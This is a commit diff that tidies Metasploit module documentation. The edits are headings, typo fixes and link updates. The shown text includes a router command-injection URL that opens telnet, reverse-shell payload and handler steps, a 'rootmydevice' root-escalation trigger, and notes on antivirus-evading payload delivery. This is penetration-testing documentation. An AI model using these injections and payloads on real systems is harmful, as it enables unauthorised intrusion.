Land rapid7#9493 updates to various docs

Author: h00die

documentation/modules/auxiliary/admin/smb/ms17_010_command.md

@@ -1,4 +1,6 @@
-MS17-010 are psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
+## Introduction
+
+MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
 
 You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
 

documentation/modules/auxiliary/gather/censys_search.md

@@ -3,10 +3,10 @@ The module use the Censys REST API to access the same data accessible through we
 ## Verification Steps
 
 1. Do: `use auxiliary/gather/censys_search`
-2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
-3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
+2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
+3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
 4. Do: `set CENSYS_SEARCHTYPE certificates`
-5: Do: `set CENSYS_DORK rapid7`
+5: Do: `set CENSYS_DORK query`
 6: Do: `run`
 
 ## Scenarios

documentation/modules/auxiliary/gather/shodan_honeyscore.md

@@ -1,8 +1,9 @@
-The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot or not. 
-When setting the module options, we aren't directly requesting `TARGET`, we are requesting the shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/. 
+## Introduction
+The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot.
+When setting the module options, we aren't directly requesting `TARGET`, we are requesting the Shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
 
-#### NOTE: 
-In order for this module to function properly, a Shodan API key is needed. You can register for a free acount here: https://account.shodan.io/register
+#### NOTE:
+In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
 
 ## Verification Steps
 
@@ -11,18 +12,18 @@ In order for this module to function properly, a Shodan API key is needed. You c
   3. Do: `set TARGET <targetip>`
   4. Do: `set SHODAN_APIKEY <your apikey>`
   5. Do: `run`
-  6. If the API is up, you should recieve a score from 0.0 to 1.0.
+  6. If the API is up, you should receive a score from 0.0 to 1.0. (1.0 being a honeypot)
 
 ## Options
 
   **TARGET**
-  
+
   The remote host to request the API to scan.
-  
+
   **SHODAN_APIKEY**
 
-  This is the API key you recieve when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
-  
+  This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
+
 
 ## Scenarios
 

documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md

@@ -7,8 +7,8 @@
   1. start `msfconsole`
   2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
   3. `set RHOST 192.168.1.1` `<--- Router IP`
-  4. `set USERNAME xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
-  5. `set PASSWORD xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
+  4. `set USERNAME xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
+  5. `set PASSWORD xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
   5. `set PAYLOAD cmd/unix/reverse_bash`
   6. `set LHOST 192.168.1.x`
   7. `set LPORT xxxx`

documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md

@@ -1,4 +1,5 @@
-The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
+## Introduction
+The `netgear_r7000_cgibin_exec` module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
 
 
 ## Vulnerable Application

documentation/modules/exploit/multi/fileformat/office_word_macro.md

@@ -75,7 +75,9 @@ If you already have Microsoft Office, you can use it to create a docx file and u
 
 ## Options
 
-**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
+**CUSTOMTEMPLATE** 
+
+A docx file that will be used as a template to build the exploit.
 
 ## Trusted Document
 

documentation/modules/exploit/multi/local/allwinner_backdoor.md

@@ -1,10 +1,12 @@
-  Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
-  Vulnerable OS: all OS images available for Orange Pis,
+## Introduction
+
+Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
+Vulnerable OS: all OS images available for Orange Pis,
 				 any for FriendlyARM's NanoPi M1,
 				 SinoVoip's M2+ and M3,
 				 Cuebietech's Cubietruck +
 				 Linksprite's pcDuino8 Uno
-  Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
+Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
 
 This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
 

documentation/modules/exploit/multi/script/web_delivery.md

@@ -1,10 +1,13 @@
+## Introduction
+
 The web_delivery module provides a stealthy way to deliver a payload during post exploitation over HTTP or HTTPS. Because the payload does not touch the disk, it can easily bypass many anti-virus protections.
 
 The web_delivery module supports three different languages for delivery: Python, PHP, and
 Powershell. You should manually select the correct target based on the victim environment you are exploiting.
 
 For example, if you have gained remote access through a PHP application, it is likely you can use PHP. If you are in a modern Windows server environment, then you can usually assume the target supports Powershell as well.
 
+
 ## Verification Steps
 
 To use the web_delivery module, you must first gain access to the target host and be able to execute either a Python, PHP, or Powershell interpreter. Then, follow these steps to proceed with exploitation:

documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md

@@ -7,16 +7,14 @@ A fix was released in the June 2017 Patch Tuesday.
 
 ## Vulnerable Setup
 
-To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.
-
+To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.
 ## Verification Steps
 
 ### Start a handler
   1. `use exploit/multi/handler`
   2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
   3. `set LHOST [ip victim connects back to]`
   4. `exploit -j`
-  5. `back`
 
 ### Run the exploit
 

documentation/modules/exploit/windows/fileformat/office_dde_delivery.md

@@ -1,4 +1,3 @@
-
 Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.
 
 ## Vulnerable Application